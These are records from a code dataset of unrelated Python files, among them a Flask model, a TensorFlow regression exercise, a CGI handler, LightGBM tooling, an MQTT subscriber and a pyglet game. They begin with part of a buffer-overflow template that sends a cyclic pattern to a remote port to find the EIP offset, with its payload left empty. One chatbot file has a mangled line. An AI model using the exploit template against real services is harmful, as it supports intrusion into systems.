sys.argv[PATTERN_FILE_LOCATION]\n\nwith open(l_pattern_file_location, 'r') as l_file:\n l_pattern = l_file.read().replace('\\n', '')\n\ntry:\n # Create a TCP (socket)\n print(\"Connecting to {} port {}\".format(l_rhost, l_rport))\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((l_rhost, l_rport))\n print(\"Connected\")\nexcept:\n print(\"Could not connect to {} port 
{}\".format(l_rhost, l_rport))\n exit(0)\n\ntry:\n # Send the message via the socket using the specific protocol\n print(\"Sending payload of length {}\".format(len(l_pattern)))\n # Example:\n # l_bytes = b'\\x11' + '(setup sound '.encode() + l_pattern.encode() + b'\\x90\\x00' + '#'.encode()\n l_bytes = ''\n s.send(l_bytes)\n data = s.recv(1024)\n print(\"Data received: {}\".format(data))\nexcept:\n print(\"Could not send payload\")\n\ntime.sleep(1)\ns.close()\n","sub_path":"buffer-overflow/template/2-find-eip-offset-template.py","file_name":"2-find-eip-offset-template.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"378229045","text":"from db import db\n\n\nclass ComicModel(db.Model):\n __tablename__ = 'comic'\n\n id = db.Column(db.Integer, primary_key=True)\n id_user = db.Column(db.Integer, db.ForeignKey('users.id'))\n id_comic = db.Column(db.Integer)\n name = db.Column(db.String(80))\n\n def __init__(self, id_user, id_comic, name):\n self.id_user = id_user\n self.id_comic = id_comic\n self.name = name\n\n @classmethod\n def find_by_id(cls, id_user, id_comic):\n return cls.query.filter_by(id_user=id_user, id_comic=id_comic).first()\n\n @classmethod\n def find_user_comics(cls, id_user, name=None):\n if name == None:\n result = cls.query.filter_by(id_user=id_user).all()\n else:\n result = cls.query.filter_by(id_user=id_user).filter(\n cls.name.like(f\"{name}%\")).all()\n return [value.id_comic for value in result]\n\n @classmethod\n def find_user_comics_by_ids(cls, id_user, ids_comic_list):\n result = cls.query.filter(cls.id_comic.in_(\n ids_comic_list)).filter_by(id_user=id_user).all()\n return [value.id_comic for value in result]\n\n def save_to_database(self):\n db.session.add(self)\n db.session.commit()\n\n def delete_from_database(self):\n db.session.delete(self)\n 
db.session.commit()\n","sub_path":"code/models/comic.py","file_name":"comic.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"630585714","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\n\n\ndef normalize(inputs):\n \"\"\"\n Normalize an input array (feature scaling)\n\n Parameters\n ----------\n inputs : an input array\n\n Returns\n -------\n scaled_inputs : an input array in unit scale.\n \"\"\"\n\n mean = np.mean(inputs)\n max_element = np.max(inputs)\n min_element = np.min(inputs)\n\n scaled_inputs = np.copy(inputs)\n\n for index in range(len(inputs)):\n scaled_inputs[index] = (inputs[index] - mean) / (max_element - min_element)\n\n return scaled_inputs\n\n\n'''\nStep 1: Read data from CSV file using Pandas\n'''\ndata_from_CSV = pd.read_csv(\"data/boston.csv\")\n\nfeature_CRIM = data_from_CSV['CRIM']\nfeature_ZN = data_from_CSV['ZN']\nfeature_INDUS = data_from_CSV['INDUS']\nfeature_CHAS = data_from_CSV['CHAS']\nfeature_NOX = data_from_CSV['NOX']\nfeature_RM = data_from_CSV['RM']\nfeature_AGE = data_from_CSV['AGE']\nfeature_DIS = data_from_CSV['DIS']\nfeature_RAD = data_from_CSV['RAD']\nfeature_TAX = data_from_CSV['TAX']\nfeature_PTRATIO = data_from_CSV['PTRATIO']\nfeature_LSTAT = data_from_CSV['LSTAT']\n\ntarget_MEDV = data_from_CSV['MEDV']\n\n'''\nStep 2: Rescale the training dataset; then, construct the features and target matrix\n'''\nscaled_feature_CRIM = np.matrix(normalize(feature_CRIM)).T\nscaled_feature_ZN = np.matrix(normalize(feature_ZN)).T\nscaled_feature_INDUS = np.matrix(normalize(feature_INDUS)).T\nscaled_feature_CHAS = np.matrix(normalize(feature_CHAS)).T\nscaled_feature_NOX = np.matrix(normalize(feature_NOX)).T\nscaled_feature_RM = np.matrix(normalize(feature_RM)).T\nscaled_feature_AGE = np.matrix(normalize(feature_AGE)).T\nscaled_feature_DIS = np.matrix(normalize(feature_DIS)).T\nscaled_feature_RAD = 
np.matrix(normalize(feature_RAD)).T\nscaled_feature_TAX = np.matrix(normalize(feature_TAX)).T\nscaled_feature_PTRATIO = np.matrix(normalize(feature_PTRATIO)).T\nscaled_feature_LSTAT = np.matrix(normalize(feature_LSTAT)).T\n\nfeatures_matrix = np.concatenate((scaled_feature_CRIM, scaled_feature_ZN, scaled_feature_INDUS, scaled_feature_CHAS,\n scaled_feature_NOX, scaled_feature_RM, scaled_feature_AGE, scaled_feature_DIS, scaled_feature_RAD,\n scaled_feature_TAX, scaled_feature_PTRATIO, scaled_feature_LSTAT), axis=1)\n\ntarget_matrix = np.matrix(target_MEDV).T\n\n'''\nStep 3: Create placeholders for features Xs and target Y\n'''\n\n# When the summation of (theta_i)(x_i) is huge, we can utilize the\n# matrix multiplication. In order to do this, we declare placeholders as 2-D matrices.\n# In the following, [None, 12] means any number of rows and 12 columns.\nX = tf.placeholder(tf.float32, [None, 12], name='X')\nY = tf.placeholder(tf.float32, [None, 1], name='Y')\n\n'''\nStep 4: Create thetas, initialized them to 0\n'''\nthetas = tf.Variable(tf.zeros([12, 1]), name='Thetas')\ntheta0 = tf.Variable(tf.zeros([1]), name='Theta0')\n\n'''\nStep 5: Define a hypothesis function to predict Y\n'''\n\n# We can tell TensorBoard to group a certain set of nodes together.\n# In order to this, we use \"with tf.name_scope(....) as scope\".\n# Try to run TensorBoard and see what happens on the graph tab.\nwith tf.name_scope('Hypothesis_Function') as scope:\n # Recall that (Theta_i)(X_i) = (theta_1)(x_1) + ... + (theta_i)(x_i) + ... 
+ (theta_n)(x_n)\n # Noted that I use capital letters to denote matrices.\n feature_theta_multiplication = tf.matmul(X, thetas)\n hypothesis_function = feature_theta_multiplication + theta0\n\n'''\nStep 6: Use the square error as the cost function\n'''\ncost_function = tf.multiply(tf.divide(1, 2), tf.reduce_mean(tf.pow(Y - hypothesis_function, 2)))\ntf.summary.scalar('total cost', cost_function)\n\n'''\nStep 7: Using gradient descent with learning rate of 0.3 to minimize cost\n'''\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.3).minimize(cost_function)\n\nwith tf.Session() as session:\n '''\n Step 8: Initialize the necessary variables\n '''\n session.run(tf.global_variables_initializer())\n\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('./graphs/multivariate_linear_regression_feature_scaling', session.graph)\n\n '''\n Step 9: Train the model for 1,000 epochs\n '''\n for i in range(1000):\n summary, _, cost = session.run([merged, optimizer, cost_function],\n feed_dict={X: features_matrix, Y: target_matrix})\n\n writer.add_summary(summary, i)\n\n print(\"Epoch: {0}, cost = {1}\".format(i+1, cost))\n\n '''\n Step 10: Prints the training cost and all thetas\n '''\n print(\"Optimization Finished!\", '\\n')\n print(\"Training cost = {}\".format(cost))\n print(\"theta0 = {}\".format(session.run(theta0)[0]))\n print(\"theta_CRIM = {}\".format(session.run(thetas)[0][0]))\n print(\"theta_ZN = {}\".format(session.run(thetas)[1][0]))\n print(\"theta_INDUS = {}\".format(session.run(thetas)[2][0]))\n print(\"theta_CHAS = {}\".format(session.run(thetas)[3][0]))\n print(\"theta_NOX = {}\".format(session.run(thetas)[4][0]))\n print(\"theta_RM = {}\".format(session.run(thetas)[5][0]))\n print(\"theta_AGE = {}\".format(session.run(thetas)[6][0]))\n print(\"theta_DIS = {}\".format(session.run(thetas)[7][0]))\n print(\"theta_RAD = {}\".format(session.run(thetas)[8][0]))\n print(\"theta_TAX = {}\".format(session.run(thetas)[9][0]))\n 
print(\"theta_PTRATIO = {}\".format(session.run(thetas)[10][0]))\n print(\"theta_LSTAT = {}\".format(session.run(thetas)[11][0]))\n\n# Close the writer when you finished using it\nwriter.close()\n\n\n","sub_path":"Week 3/Assignment Guide/assignment2-problem3-solution2.py","file_name":"assignment2-problem3-solution2.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301214893","text":"# -*- coding: utf-8 -*- ?\nimport sqlite3\nimport cgi\n\n# подключаемся к БД\ncon = sqlite3.connect(\"news.db\")\nwith con:\n cursor = con.cursor()\n # создаем таблицу если она не создана\n cursor.execute(\"CREATE TABLE IF NOT EXISTS devices(id INT, temperature INT, door INT);\")\n\n # получаем все данные из запроса\n form = cgi.FieldStorage()\n device_id = int(form.getfirst(\"id\", \"0\"))\n temperature = int(form.getfirst(\"temperature\", \"0\"))\n door = form.getfirst(\"door\", \"0\")\n\n # ищем устройство в БД\n cursor.execute(\"SELECT * FROM devices WHERE id = %s\" % device_id)\n device = cursor.fetchall()\n\n # проверяем сущестувет ли устройство\n if not device:\n # заносим устройство в БД (т.к. Оно впервые подключилось к сети)\n cursor.execute(\"INSERT INTO devices VALUES(?,?,?)\",(device_id,temperature,door))\n else:\n # изменяем данные на новые\n cursor.execute(\"UPDATE devices SET door = ? 
WHERE id = ?\",(door, device_id))\n","sub_path":"server/cgi-bin/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81239708","text":"from programr.utils.logging.ylogger import YLogger\n\nfrom programr.parser.template.nodes.base import TemplateNode\nfrom programr.services.service import ServiceFactory\nfrom programr.parser.exceptions import ParserException\nfrom programr.utils.text.text import TextUtils\n\nclass TemplateSRAIXNode(TemplateNode):\n\n def __init__(self):\n TemplateNode.__init__(self)\n self._service = None\n\n @property\n def service(self):\n return self._service\n\n @service.setter\n def service(self, service):\n self._service = service\n\n def resolve_to_string(self, client_context):\n resolved = self.resolve_children_to_string(client_context)\n YLogger.debug(client_context, \"[%s] resolved to [%s]\", self.to_string(), resolved)\n\n if self._service is not None:\n bot_service = ServiceFactory.get_service(self._service)\n response = bot_service.ask_question(client_context, resolved)\n YLogger.debug(client_context, \"SRAIX service [%s] return [%s]\", self._service, response)\n return response\n else:\n YLogger.error(client_context, \"Sorry SRAIX does not currently have an implementation for [%s]\", self._service)\n return \"\"\n\n def resolve(self, client_context):\n try:\n return self.resolve_to_string(client_context)\n except Exception as excep:\n YLogger.exception(client_context, \"Failed to resolve\", excep)\n return \"\"\n\n def to_string(self):\n if self._service is not None:\n return \"SRAIX (service=%s)\" % (self._service)\n return \"SRAIX ()\"\n\n def to_xml(self, client_context):\n xml = 'TEMPLATE_EXPRESSION
    | TEMPLATE_EXPRESSION |\n # TEMPLATE_EXPRESSION | TEMPLATE_EXPRESSION | TEMPLATE_EXPRESSION\n # SRAIX_EXPRESSION ::== TEMPLATE_EXPRESSION |\n\n def parse_expression(self, graph, expression):\n\n if 'host' in expression.attrib:\n YLogger.warning(self, \"'host' attrib not supported in sraix, moved to config, see documentation\")\n if 'botid' in expression.attrib:\n YLogger.warning(self, \"'botid' attrib not supported in sraix, moved to config, see documentation\")\n if 'hint' in expression.attrib:\n YLogger.warning(self, \"'hint' attrib not supported in sraix, moved to config, see documentation\")\n if 'apikey' in expression.attrib:\n YLogger.warning(self, \"'apikey' attrib not supported in sraix, moved to config, see documentation\")\n\n if 'service' in expression.attrib:\n self.service = expression.attrib['service']\n\n head_text = self.get_text_from_element(expression)\n self.parse_text(graph, head_text)\n\n for child in expression:\n tag_name = TextUtils.tag_from_text(child.tag)\n\n if tag_name == 'host':\n YLogger.warning(self, \"'host' element not supported in sraix, moved to config, see documentation\")\n elif tag_name == 'botid':\n YLogger.warning(self, \"'botid' element not supported in sraix, moved to config, see documentation\")\n elif tag_name == 'hint':\n YLogger.warning(self, \"'hint' element not supported in sraix, moved to config, see documentation\")\n elif tag_name == 'apikey':\n YLogger.warning(self, \"'apikey' element not supported in sraix, moved to config, see documentation\")\n elif tag_name == 'service':\n self.service = self.get_text_from_element(child)\n else:\n graph.parse_tag_expression(child, self)\n\n tail_text = self.get_tail_from_element(child)\n self.parse_text(graph, tail_text)\n\n if self.service is None:\n raise ParserException(\"SRAIX node, service attribute missing 
!\")\n","sub_path":"src/programr/parser/template/nodes/sraix.py","file_name":"sraix.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493673234","text":"'''解析conf配置文件'''\nimport configparser\nimport os\nfrom ccxgbm.model_function import load_data, model_data, model_cv, save_data, get_bstpram, model_train, save_bstmodel, \\\n get_importance_var, model_predict, plot_ks_line, plot_roc_line, get_modelpredict_re, write_path, rmemptydir\nimport pandas as pd\n\n\ndef extract_conf(conf_path, conf_section):\n conf = configparser.ConfigParser()\n conf.read(conf_path)\n kvs = conf.items(conf_section)\n\n param = {}\n for (m, n) in kvs:\n n_v = n.split(',')\n new_n_v = []\n for j in n_v:\n try:\n try:\n new_n_v.append(int(j))\n except:\n new_n_v.append(float(j))\n except:\n new_n_v.append(j)\n param[m] = new_n_v\n return param\n\n\ndef ccxgbm_main(train_path, test_path, index_name, target_name):\n # 1.读取数据\n train = load_data(train_path) # .select_dtypes(exclude=['object'])\n test = load_data(test_path) # .select_dtypes(exclude=['object'])\n\n object_var = list(train.select_dtypes(include=['object']).columns.values)\n warn_col = [x for x in object_var if x not in [index_name]]\n if warn_col:\n print('数据中列名为%s的列,不是数值型数据,请转换为数值型数据或删除后再输入.' 
% warn_col)\n\n del_col = [index_name, target_name] + warn_col\n x_colnames = [x for x in train.columns if x not in del_col]\n y_colnames = target_name\n\n # 2.转换数据格式为模型要求格式\n dtrain = model_data(train, x_colnames, y_colnames)\n dtest = model_data(test, x_colnames, y_colnames)\n\n # 解析配置文件,获取网格搜索的调参列表\n conf_path = os.path.split(os.path.realpath(__file__))[0] + '/ccxgbm.conf'\n # print('###########', conf_path)\n param_grid = extract_conf(conf_path, 'GBM_PARAMS')\n print('网格参数集:%s' % param_grid)\n\n # 用config对象读取配置文件,获取到交叉验证的option参数\n conf = configparser.ConfigParser()\n conf.read(conf_path)\n num_boost_rounds = conf.getint(\"GBM_OPTIONS\", \"num_round\")\n # nthread = conf.getint(\"XGB_OPTIONS\", \"nthread\")\n cv = conf.getint(\"GBM_OPTIONS\", \"cv\")\n cv_mess = conf.get(\"GBM_OPTIONS\", \"cv_mess\")\n\n # 网格搜索\n re = model_cv(train, x_colnames, y_colnames, param_grid, num_boost_rounds, nfold=cv, message=cv_mess)\n file_name = cv_mess + '_' + str(cv) + 'FlodCV.csv'\n cv_result_path = save_data(pd.DataFrame(re.cv_results_), file_name, index=True)\n\n param = get_bstpram(re)\n param = dict(param, **{'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': 'auc'})\n print('最优参数为%s' % param)\n bst = model_train(dtrain, dtest, param, num_boost_rounds)\n model_path = save_bstmodel(bst, cv_mess)\n # bst.dump_model('bst_model.txt')\n\n # 重要变量\n imp_var = get_importance_var(bst)\n # plot_imp(bst)\n imp_path = save_data(imp_var, 'importance_var.csv')\n\n # 模型预测与模型评估\n train_pred_y, test_pred_y = model_predict(bst, train, test, x_colnames, y_colnames, message=cv_mess)\n # 模型预测结果\n pred_path = save_data(get_modelpredict_re(test[index_name], test_pred_y), 'test_predict.csv')\n # 画图\n trks_path = plot_ks_line(dtrain.get_label(), train_pred_y, title=cv_mess + '_train_ks-line')\n trauc_path = plot_roc_line(dtrain.get_label(), train_pred_y, title=cv_mess + '_train_ROC-line')\n # 注意,现在仅支持测试集有目标变量的,没有的情况需要后期优化时注意\n teks_path = plot_ks_line(dtest.get_label(), test_pred_y, 
title=cv_mess + '_test_ks-line')\n teauc_path = plot_roc_line(dtest.get_label(), test_pred_y, title=cv_mess + '_test_ROC-line')\n\n path_list = [cv_result_path, model_path, imp_path, pred_path, trks_path, trauc_path, teks_path, teauc_path]\n file = r'C:\\Users\\liyin\\Desktop\\20170620_tn\\0620_base\\model\\modelpath.txt'\n write_path(file, path_list)\n # print(path_list)\n\n rmemptydir(conf.get(\"DIRECTORY\", \"project_pt\"))\n\n\nif __name__ == '__main__':\n train_path = r'C:\\Users\\liyin\\Desktop\\20170620_tn\\0620_base\\train_base14.csv'\n test_path = r'C:\\Users\\liyin\\Desktop\\20170620_tn\\0620_base\\test_base14.csv'\n index_name = 'contract_id'\n target_name = 'target'\n\n ccxgbm_main(train_path, test_path, index_name, target_name)\n","sub_path":"ccxgbm/ccxgbm_main.py","file_name":"ccxgbm_main.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141126723","text":"import json\n\ncontrib_threshold = 1\ninteract_threshold = 1\n\nnum_repos = None\nnum_users = None\n\ndef get_next_date(month, day):\n month_days = [None, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n day += 1\n if day > month_days[month]:\n month += 1\n day = 1\n return month, day\n\ndef dump_edges(nodes, file_name):\n print(\"Generating {0}\".format(file_name))\n with open(file_name, 'w') as f:\n for i in range(num_repos):\n for j in range(i+1, num_repos):\n common_contribs = len(nodes[i]['contrib'].intersection(nodes[j]['contrib']))\n common_interacts = len(nodes[i]['interact'].intersection(nodes[j]['interact']))\n if common_contribs >= contrib_threshold and common_interacts >= interact_threshold:\n f.write(\"{0},{1},{2},{3}\\n\".format(i, j, common_contribs, common_interacts))\n\nrepos = []\nwith open('repo_list.txt') as f:\n repos = [line.rstrip() for line in f.readlines()]\nnum_repos = len(repos)\nrepo_map = {repos[i]: i for i in range(num_repos)}\n\nusers = []\nwith open('user_list.txt') as 
f:\n users = [line.rstrip() for line in f.readlines()]\nnum_users = len(users)\nuser_map = {users[i]: i for i in range(num_users)}\n\nnodes = []\nfor i in range(num_repos):\n nodes.append({'contrib': set(), 'interact': set()})\n\nmonth = 1\nday = 1\nwhile month < 13:\n if day == 1:\n print(\"Reading data for month {0}\".format(month))\n with open(\"data/{0:02}{1:02}-all.json\".format(month, day)) as f:\n for line in f:\n e = json.loads(line.rstrip())\n if e['actor'] not in user_map:\n continue\n user = user_map[e['actor']]\n repo = repo_map[e['repo']]\n nodes[repo]['interact'].add(user)\n if e['type'] == 'PullRequestEvent' or e['type'] == 'PushEvent':\n nodes[repo]['contrib'].add(user)\n if month == 6 and day == 30:\n dump_edges(nodes, \"snapshot-0630.txt\")\n elif month == 12 and day == 31:\n dump_edges(nodes, \"snapshot-1231.txt\")\n month, day = get_next_date(month, day)\n","sub_path":"build_snapshots.py","file_name":"build_snapshots.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"577359149","text":"from requests_html import HTMLSession,HTMLResponse\nimport urllib.request\n\nsession = HTMLSession()\nresponse = session.get(\"http://books.toscrape.com/\")\n#print(response) #STATUS CODE OK(200)\n\nsource = response.html\n#print(type(source))\n#print(source)\n#print(source.text)\n#print(source.html)\n\n\n# title=source.find('', first=True)\n#print(title[0].text)\n\nblock = source.find('ol.row', first=True) #TAG 'OL' CLASS 'ROW'\n#print(block) #ELEMENT\n#print(block.text) #ALL BLOCk\n\n#title = block.find('li h3 a', first=True)\n#print(title.text) #THE SHORT TITLE\n#print(title.attrs['title']) #ATTRIBUTE OF TITLE IS 'title'\n#print(title.attrs['href']) #LINK FOR THE TITLE\n\n\ntitles = block.find('li h3 a') #FOR ALL \n#for title in titles:\n# print(title.attrs['title'])\n #print(title.attrs['href']) \n\n#price = block.find('li p.price_color', first=True) #FOR 
FIRST\n#print(price.text) #WITH EURO SIGN\n#print(price.text[1:]) #WITHOUT EURO SIGN\n\nprices = block.find('li p.price_color') #FOR ALL\n# for price in prices:\n# print(price.text) #WITH EURO SIGN\n #print(price.text[1:]) #WITHOUT EURO SIGN\n\n #FOR APPENDING AND PRINTING\nname = []\ncost = []\nfor title in titles:\n name.append(title.attrs['title'])\nfor price in prices:\n cost.append(price.text)\n\n# for i in range(len(name)):\n# print(name[i])\n# print(cost[i])\n\n#image = block.find('li div.image_container img', first=True)\n#print('http://books.toscrape.com/'+image.attrs['src'])\n\nimages = block.find('li div.image_container img')\n\nlink = []\n\nfor image in images:\n link.append('http://books.toscrape.com/'+image.attrs['src'])\n\n\n\n\n# divs = source.find('div.row', first=True)\n# print(divs)\n\n# for i in range(len(name)):\n# print(name[i])\n# print(cost[i])\n# print(link[i])\n# urllib.request.urlretrieve(link[i], name[i])\n# print('\\n')\n\nurl=[\"http://books.toscrape.com/catalogue/page-2.html\"]\nfor no in range(1,51):\n url.append(f\"http://books.toscrape.com/catalogue/page-{no}.html\")\n print(url)\n","sub_path":"scrape2.py","file_name":"scrape2.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"223460104","text":"import paho.mqtt.client as mqtt\nimport pyaes\nimport hashlib\nimport time\nimport configparser\nfrom time import sleep\n\n# import psutil\n\nconfig = configparser.RawConfigParser()\nconfig.read('config/config-subscriber.txt')\nusername = config.get('credential', 'username')\npassword = config.get('credential', 'password')\ntopic = config.get('credential', 'topic')\nserver = config.get('host', 'server')\nport = config.getint('host', 'port')\nkeepalive = config.getint('host', 'keep-alive')\nsecretkey = config.get('key', 'key')\nclientid = config.get('credential', 'client')\n#server = \"192.168.1.158\"\n\n\ndef on_connect(client, userdata, 
flags, rc):\n print(\"Connected with Code :\" + str(rc))\n client.subscribe(topic)\n\n\nkey = secretkey\nkey = key.encode('utf-8')\ncounter = pyaes.Counter(initial_value=0)\naes = pyaes.AESModeOfOperationCTR(key, counter=counter)\n\n\n\ndef on_message(client, userdata, msg):\n client = mqtt.Client()\n\n #start process exec\n start = time.clock()\n\n msg = msg.payload\n\n #start decrypption time\n startDS = time.clock()\n\n decrypted = aes.decrypt(msg).decode('utf-8')\n\n n = 96\n parts = [decrypted[i:i + n] for i in range(0, len(decrypted), n)]\n hashValue = ''.join(parts[0])\n pesanAsli = ''.join(parts[1])\n print(\"\")\n\n m = hashlib.sha384()\n m.update(pesanAsli.encode('utf-8'))\n digest = m.hexdigest()\n\n if hashValue == digest:\n mout.append(pesanAsli)\n\n sleep(0.1)\n\n #end decryption time\n endDS = time.clock()\n\n #end process exec\n end = time.clock()\n\n #variable temp\n btos = end-start\n btosdec = endDS-startDS\n\n #open file\n f = open('ptob.txt').readline()\n fd = open('ptob-ds.txt').readline()\n timeexec = btos+float(f)\n timedec = btosdec+float(fd)\n\n #write file\n f = open('delivery.txt', 'a')\n f.write(str(timeexec)+\"\\n\")\n f = open('outds.txt', 'a')\n f.write(str(timedec)+\"\\n\")\n\n\nclient = mqtt.Client(clientid)\nclient.username_pw_set(username, password)\nclient.connect(server, port, keepalive)\n\nclient.on_connect = on_connect\n\nclient.on_message = on_message\nmout = []\nclient.loop_start()\nwhile True:\n sleep(0.1)\n if len(mout) > 0:\n counter = pyaes.Counter(initial_value=0)\n aes = pyaes.AESModeOfOperationCTR(key, counter=counter)\n print(mout.pop())\nclient.loop_stop()","sub_path":"testing/SHA-384/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"612111954","text":"from django.http import JsonResponse\nfrom django.views.generic import ListView\nfrom testwork.pictures.models import 
Picture\n\n\nclass PicturesUrlsListView(ListView):\n\n model = Picture\n def get_queryset(self):\n \"\"\"Set filtering condition as tag property equals\n request's tag parameter with \"starting\" by default\n :return QuerySet:\n \"\"\"\n return super(ListView, self).get_queryset().filter(\n tag=self.request.GET.get('tag', 'starting')\n )\n\n def get(self, request, *args, **kwargs):\n \"\"\"Create and return Response object with json content contains list\n of pictures images urls.\n :param request:\n :param args:\n :param kwargs:\n :return JsonResponse:\n \"\"\"\n return JsonResponse(\n data=[p.imagefile.url\n for p in self.get_queryset().only('imagefile')],\n safe=False\n )\n","sub_path":"testwork/pictures/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219025818","text":"from django.conf.urls import patterns, include, url\nfrom django.conf import settings\nfrom .views import BaseView, createuser\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'webservices.views.home', name='home'),\n # url(r'^webservices/', include('webservices.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^ckeditor/', include('ckeditor.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^portfolio/', include('portfolio.urls')),\n url(r'^testimonial/', include('testimonial.urls')),\n url(r'^services/', include('services.urls')),\n url(r'^contacts/', include('contacts.urls')),\n url(r'^createadmin/$', createuser),\n url(r'^$', BaseView.as_view(), name=\"root\"),\n \n \n \n url(r'^media/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n 
url(r'^static/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT,\n }), \n)\n","sub_path":"webservices/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"40300730","text":"import json\nfrom projectile import PROJECTILES, Projectile\nimport pyglet\nfrom pyglet import gl\nfrom pyglet.window import key\nfrom player import Player\nfrom levelgen import LevelGenerator\nfrom client import start_client\nfrom pymunk import Vec2d\n\npyglet.options['audio'] = ('alsa', 'openal', 'directsound', 'silent')\nimport pyglet.media\nimport asyncio\nimport sys\nimport random\n\nNAME = \"\"\nif len(sys.argv) > 1:\n NAME = sys.argv[1]\nelse:\n print(\"No name supplied in arguments, generating one\")\n NAME = \"\".join(str(chr(random.randint(97, 122))) for i in range(0, random.randint(3, 12)))\nprint(NAME)\n\nwindow = pyglet.window.Window()\nmap_batch = pyglet.graphics.Batch()\nmap_sprites = LevelGenerator.generate_level(map_batch)\nADDR = ('127.0.0.1', 8888)\n\ncharacter_batch = pyglet.graphics.Batch()\n####CHARACTER LOADING\nPLAYERS = {} # this global dictionary will own the players once they join.\nMYSELF = None\nkey_states = {\"UP\": False, \"DOWN\": False,\n \"LEFT\": False, \"RIGHT\": False,\n \"name\": NAME}\n\n\ndef update():\n from client import TRANSPORT\n if TRANSPORT:\n key_states.update(client=NAME)\n TRANSPORT.sendto(json.dumps(key_states).encode(), ADDR)\n LOOP.call_later(0.005, update)\n for p in PROJECTILES.values():\n p.update()\n\n\n@window.event\ndef on_mouse_press(x, y, button, modifiers):\n v = Vec2d(x - window.width / 2, y - window.height / 2) + MYSELF.body.position + Vec2d(16, 16)\n from client import TRANSPORT\n if TRANSPORT:\n click_state = {\"click\": [v.x, v.y]}\n click_state.update(key_states)\n TRANSPORT.sendto(json.dumps(click_state).encode(), ADDR)\n\n\n@window.event\ndef on_key_press(symbol, 
modifiers):\n if symbol == key.UP:\n key_states[\"UP\"] = True\n elif symbol == key.DOWN:\n key_states[\"DOWN\"] = True\n elif symbol == key.LEFT:\n key_states[\"LEFT\"] = True\n elif symbol == key.RIGHT:\n key_states[\"RIGHT\"] = True\n\n\n@window.event\ndef on_key_release(symbol, modifiers):\n if symbol == key.UP:\n key_states[\"UP\"] = False\n elif symbol == key.DOWN:\n key_states[\"DOWN\"] = False\n elif symbol == key.LEFT:\n key_states[\"LEFT\"] = False\n elif symbol == key.RIGHT:\n key_states[\"RIGHT\"] = False\n\n\n@window.event\ndef on_draw():\n gl.glPushMatrix()\n if MYSELF:\n gl.glTranslatef(-MYSELF.body.position.x + window.width / 2,\n -MYSELF.body.position.y + window.height / 2, 0)\n map_batch.draw()\n for c in PLAYERS.values():\n c.draw()\n for p in PROJECTILES.values():\n p.draw()\n gl.glPopMatrix()\n gl.glFinish()\n\n\ndef data_received(byte_data):\n data = json.loads(byte_data)\n if data[\"type\"] == \"player\":\n pid = data[\"id\"]\n if pid not in PLAYERS.keys():\n print(\"player {} added\".format(data['name']))\n PLAYERS[pid] = Player(id=data[\"id\"], name=data['name'], batch=character_batch)\n if PLAYERS[pid].name == str(NAME):\n # FIXME: This isn't happening correctly.\n print(\"found myself\")\n global MYSELF\n MYSELF = PLAYERS[pid]\n PLAYERS[pid].read_datagram(data)\n elif data[\"type\"] == \"projectile\":\n pid = data[\"id\"]\n if pid not in PROJECTILES:\n PROJECTILES[pid] = Projectile(data[\"position\"], Vec2d(0, 0), id=key)\n PROJECTILES[pid].read_datagram(data)\n\nLOOP = asyncio.get_event_loop()\nLOOP.call_later(0.005, update)\nmusic = pyglet.resource.media('sound/dst-1990.mp3')\nmusic.play()\nstart_client(data_received_callback=data_received)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"209777347","text":"def fizz_buzz(this_number):\n for i in range(this_number):\n if i%3 == 0 and i%5 == 0:\n 
